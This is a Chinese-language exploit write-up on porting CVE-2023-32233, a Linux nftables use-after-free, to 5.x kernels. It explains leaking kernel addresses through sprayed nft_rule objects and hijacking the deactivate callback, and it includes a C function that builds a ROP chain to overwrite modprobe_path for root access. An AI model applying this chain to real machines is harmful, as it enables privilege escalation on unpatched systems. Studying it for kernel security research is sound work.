CVE-2023-32233 5.x内核适配

现有EXP

  1. https://github.com/Liuk3r/CVE-2023-32233/tree/main
  2. https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2023-32233_mitigation

原因

由于低版本(<5.16)内核中缺少了补丁,导致无法使用nft_quota结构体的consumed字段来写读写内存地址,考虑使用rop的方法进行提权。google的exp里使用了NFT_MSG_DELRULE+NFT_MSG_DELSET的方法来触发uaf,但是实际测试中发现该脚本会在nf_table_commit->list_del_rcu中直接crash。

方法

本exp在v5.15.110版本测试通过

结合两个exp,喷射nft_rule结构体,通过list_head泄漏内核栈地址,通过nft_expr->ops泄漏内核地址,通过nft_expr->ops->deactivate劫持控制流。

struct nft_rule {
	struct list_head		list;
	u64				handle:42,
					genmask:2,
					dlen:12,
					udata:1;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(struct nft_expr))));
};

struct nft_expr {
	const struct nft_expr_ops	*ops;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(u64))));
};


static void nft_rule_expr_deactivate(const struct nft_ctx *ctx,
				     struct nft_rule *rule,
				     enum nft_trans_phase phase)
{
	struct nft_expr *expr;

	expr = nft_expr_first(rule);
	while (nft_expr_more(rule, expr)) {
		if (expr->ops->deactivate)
			expr->ops->deactivate(ctx, expr, phase);        // [7]

		expr = nft_expr_next(expr);
	}
}

为了提权方便,直接沿用exp1基于modprobe_path的方法,构造的ROP如下。

// /sbin/modpath -> //tmp/modpath
void make_payload_rop(uint64_t* data) {
    data[0] = kbase + POP_5REG_RET; // skip metadata
    data[5] = kbase + PUSH_RAX_POP_RSP; // expr->ops->deactivate
    // /tmp/mod -  sbin/mod
    // 0x646f6d2f706d742f - 0x646f6d2f6e696273 = 0x20411bc
    data[6] = kbase + POP_RAX_RET;
    data[7] = kbase + cfg_modprobe_path+1; // [rax]
    data[8] = kbase + POP_RDI_RET;
    data[9] = 0x20411bc; // rdi
    data[10] = kbase + ADD_RAX_0_EDI; // add [rax], edi
}

首先内核执行到data[5]处,rax中保存的块开头的地址(&data[0]),使用push rax; pop rsp; ret;完成栈迁移,不可避免的造成栈破坏(后续无法正常返回用户态,如果需要到用户态提权可以构造更大的块(>0x80)参考exp中的make_payload_rop2,使用swapgs_restore_regs_and_return_to_usermode绕过kpti并返回用户态)。 由于伪造的nft_rule有0x18字节元数据(主要是0x10偏移处的8字节),需要使用pop跳过这些地址,后面就随意发挥了,使用一些简短的gadgets修改modprobe_path即可。